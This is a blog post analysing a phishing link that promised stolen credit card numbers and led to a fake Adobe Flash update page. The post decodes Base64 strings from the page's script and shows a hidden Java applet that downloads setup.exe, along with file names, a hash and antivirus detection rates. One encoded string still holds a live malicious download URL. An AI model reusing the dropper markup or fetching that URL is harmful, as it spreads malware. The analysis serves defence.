I got a phishing mail, and I followed it

Rishi Narang
 /  Hacking  /
I got a phishing mail, and I followed it

We come across so many links via social networking websites, and we unknowingly click many of these. The malicious links have catastrophic results and the system as well as yours privacy is either compromised or your data takes the hit. Here is one such analysis of a link dated 17.April.2012 that I came across via Twitter and LinkedIn.

NOTE: All links have been appended with ‘non-clickable’ suffix hxxp:// to prevent mistaken clicks.

Someone posted this link (hxxp://pastebin.com/dRGHt7hy) on a tweet. On checking, it was a list of URLs (actually single URL pasted multiple times – a sign of desperation),

  • hxxp://tinyurl.com/saw87hujnworeg
  • hxxp://tinyurl.com/saw87hujnworeg
  • hxxp://tinyurl.com/saw87hujnworeg
  • hxxp://tinyurl.com/saw87hujnworeg

9954 credit card numbers

It states this link has 9954 credit card numbers. The first malicious hint is – Why not posting it directly rather than pasting the same link 4 times in an entry.

Next, this is too much of a luring target; so walk safe. So I opened the link in Malzilla (http://malzilla.sourceforge.net/) a malware hunting tool. I disabled the auto-redirect. The link hxxp://tinyurl.com/saw87hujnworeg redirected to hxxp:// which opened as text fields with scripts. The file contained only a ‘doubtful’ script with some headings and titles.

Here is the only important script contained within the page. Let’s do the analysis.

This script if too complex to understand due to large variable names, so lets first change the variable names to shorter versions for better understanding. Here is the modified script with short variable names without changing the logic and working of it.

Now, it is easy to understand the logic and working of the script. First, let us decode the setTimeout and document.write fields. They look like Base64 Encoded so, let’s try to decode them. The encoded strings are,

1. QWRvYmUgRmxhc2ggbXVzdCBiZSB1cGRhdGVkIHRvIHZpZXcgdGhpcywgcGxlYXNlIGluc3RhbGwgdGhlIGxhdGVzdCB2ZXJzaW9uIQ==
2. aHR0cDovLzIxMi45NS40My4yNDMvamRiL2xpYi9hZG9iZS5waHA/aWQ9MGI3NDBlYmNjMmFiYmM1NTEyYzQ4NzVhMGY3NDk2NWI=
3. DQoJCTxhcHBsZXQgd2lkdGg9IjBweCIgaGVpZ2h0PSIwcHgiIGNvZGU9IlNpdGVMb2FkZXIuY2xhc3MiIGFyY2hpdmU9Imh0dHA6Ly8yM


Decoded strings are,

Adobe Flash must be updated to view this, please install the latest version!

1. hxxp://
2. <applet width="0px" height="0px" code="SiteLoader.class"
3. archive="hxxp://"> 

<param name="wcZPN" value="hxxp://"> 
<param name="v8TOX" value="setup.exe"> 
<param name="Legym" value="www.dogscast.com"> 
<param name="MpBDG" value="APPDATA"> 

The first decoded string has been set to entice the victim to click installing the ‘latest version’ of flash via their malicious link. So, we can see it will again issue a GET request to the following links,

  1. hxxp://
  2. hxxp://
  3. hxxp://

And parameters are,

  1. name=“wcZPN” value=“hxxp://”
  2. name=“v8TOX” value=“setup.exe”
  3. name=“Legym” value=“www.dogscast.com
  4. name=“MpBDG” value=“APPDATA”

Let us know access these URLs.

  1. First I accessed the adobe.php URL (hxxp:// via Malzilla and it downloaded a file “Adobe-Flash_WIN.exe” on my system. The size of this file is approx 1.16 Mb. This file when scanned via VirusTotal had the catch rate of 2/42 anti-malware products. Now, this is scary. I didn’t get a chance to do the run time analysis of this file, but yes will post it in the next blog.

  2. On accessing the second URL (hxxp:// it downloads a JAR file “0b740ebcc2abbc5512c4875a0f74965b.jar”. This file when extracted results in the “META-INF” directory and “SiteLoader.class” file. The contents of META-INF includes,


Now let’s analyze the third URL load.php (hxxp:// via Malzilla. When accessed, this link downloads a “setup.exe” file on the host. This file is the same as the previous file as per the SHA56 hash cb3869fa81086e4f91a61663ccac100f5099ccf4564a971f955f1a61d37aecf5.

This is a brief analysis of a phishing link, which started via twitter as a PASTEBIN link, and made its way to reach your system through various files.

Cover Image: Photo by Wynand van Poortvliet on Unsplash